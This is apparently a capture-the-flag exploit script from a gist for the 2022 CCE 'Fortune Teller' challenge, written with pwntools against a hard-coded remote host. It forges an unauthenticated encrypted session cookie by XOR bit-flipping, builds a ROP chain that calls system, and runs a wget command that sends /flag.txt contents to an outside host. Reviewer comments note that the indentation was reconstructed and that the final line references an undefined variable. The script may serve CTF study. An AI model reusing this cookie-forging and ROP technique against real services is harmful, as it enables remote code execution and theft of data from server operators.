- SQLite3 extension reversing
- ROP with bit flipping attack
- Cryptographic logic was identified by bindiff
Created
September 24, 2022 13:38
2022 CCE - Fortune Teller Exploit Code
from pwn import *
import requests
# Target selection. The local test URL is left commented out; the active value is a
# hard-coded remote host and port.
# NOTE(review): a hard-coded target is easy to run against the wrong host by
# accident — reading it from an environment variable or CLI argument is safer.
#baseurl = 'http://localhost:31337'
baseurl = 'http://52.78.80.102:31337'
def index(token):
    """GET the index page, presenting *token* base64-encoded in the ``token`` cookie.

    *token* is raw bytes; ``b64e`` (pwntools) encodes it. Returns the ``requests``
    response object unchanged.
    """
    cookie_jar = {'token': b64e(token)}
    return requests.get(baseurl, cookies=cookie_jar)
def signin(username, password):
    """POST *username*/*password* as form fields to ``/signin``.

    Redirects are not followed, so the caller receives the immediate response
    (the token cookie is read from it elsewhere in this file). Returns the
    ``requests`` response object.
    """
    form = {'username': username, 'password': password}
    return requests.post(baseurl + '/signin', data=form, allow_redirects=False)
def signup(username, password):
    """POST *username*/*password* as form fields to ``/signup``.

    Mirrors ``signin``: redirects are not followed and the immediate
    ``requests`` response object is returned.
    """
    form = {'username': username, 'password': password}
    return requests.post(baseurl + '/signup', data=form, allow_redirects=False)
def xor_payload_after(payload, offset=0x10):
    """Chain 16-byte blocks by XOR, starting at *offset*.

    Walks *payload* in 0x10-byte steps from *offset* and replaces each block with
    ``xor(previous_block, block)``, where the previous block is the already
    rewritten one immediately before it. The input is not modified; the result is
    returned as ``bytes``. ``xor`` is pwntools' helper, so a trailing block shorter
    than 0x10 bytes inherits that helper's length handling. In this file the
    function is only referenced from commented-out code.
    """
    buf = bytearray(payload)
    block = 0x10
    end = len(buf)
    pos = offset
    while pos < end:
        previous = buf[pos - block:pos]
        buf[pos:pos + block] = xor(previous, buf[pos:pos + block])
        pos += block
    return bytes(buf)
# --- Stage 1: register and sign in with a known username, capture the issued token ---
print("GET")
payload = b'A' * (0x80 - 2)
signup(payload, b'password')
resp = signin(payload, b'password')
token = bytearray(b64d(resp.cookies['token']))
print(hexdump(token))
# Two 8-byte slices of the token are reused below: `encpad` verbatim, and
# `enckey` as the XOR difference between token[0x30:0x38] and the known
# username bytes ('A' * 8) that sit at that position.
# NOTE(review): the server accepts a token whose bytes have been spliced and
# XOR-adjusted, which suggests the token carries no integrity protection
# (MAC / authenticated encryption) — presumably; confirm server-side.
encpad = token[0x38:0x40]
enckey = xor(token[0x30:0x38], b'A' * 0x8)
# Earlier attempt left commented out by the author (the only use of xor_payload_after):
# payload = token[:0x30]
# payload += encpad * ((0x120 - 0x30) // 0x10)
# index(xor_payload_after(payload, 0x30))
# --- Stage 2: gadget addresses; `e` is loaded from a local copy of the target binary ---
# 0x00000000006591bf: mov qword ptr [rbp + 0x10], r12; pop rbx; pop rbp; pop r12; ret;
g0 = 0x00000000006591bf
# 0x0000000000424edc: pop rbp; pop r12; pop r13; ret;
g1 = 0x0000000000424edc
# 0x000000000066e2a6: pop rbx; pop rbp; pop r13; ret;
g2 = 0x000000000066e2a6
# 0x0000000000424ba4: pop r12; ret;
pr = 0x0000000000424ba4
e = ELF("./python3.9")
# No disassembly given by the author for this one; the name suggests three pops + ret — unverified.
pppr = 0x00000000004e6e39
# --- Stage 3: assemble the forged token ---
payload = b'A' * 0x110
cmd = b'wget http://ch4n3.kr:2334?flag=$(cat /flag.txt)\0'
# Every controlled qword is emitted as the pair xor(enckey, value) + encpad;
# the trailing `# ...` comments are the author's register annotations.
# NOTE(review): the original indentation was lost in the gist rendering. The
# loop body is reconstructed here as the g1 / g2 / g0 / pr sequence per 8-byte
# chunk of `cmd` (through the `pr start` line), with the pppr / system tail
# emitted once after the loop — confirm against the author's original file.
for i in range(0, len(cmd), 8):
    payload += xor(enckey, p64(g1))
    payload += encpad # g1 start
    payload += xor(enckey, cmd[i:i+8].ljust(8, b'\0')) # rbp
    payload += encpad # r12
    payload += xor(enckey, p64(g2)) # r13
    payload += encpad # g2 start
    payload += xor(enckey, p64(e.bss(0x7f0)+i)) # rbx
    payload += encpad # rbp
    payload += xor(enckey, p64(g0)) # r13
    payload += encpad # g0 start
    payload += encpad # rbx
    payload += encpad # rbp
    payload += xor(enckey, p64(pr)) # r12
    payload += encpad # pr start
payload += xor(enckey, p64(pppr))
payload += encpad
payload += xor(enckey, p64(e.bss(0x800)))
payload += encpad
payload += xor(enckey, p64(e.plt['system']))
# payload += xor(enckey, p64(0x41414141))
payload += encpad
# --- Stage 4: send the forged token as the cookie of a GET / ---
print("EXP")
index(payload)
# NOTE(review): `p` is never defined in this file (a pwntools tube name left
# over from a template), so this line raises NameError. It only runs after the
# request above has already been sent, but it should be removed.
p.interactive()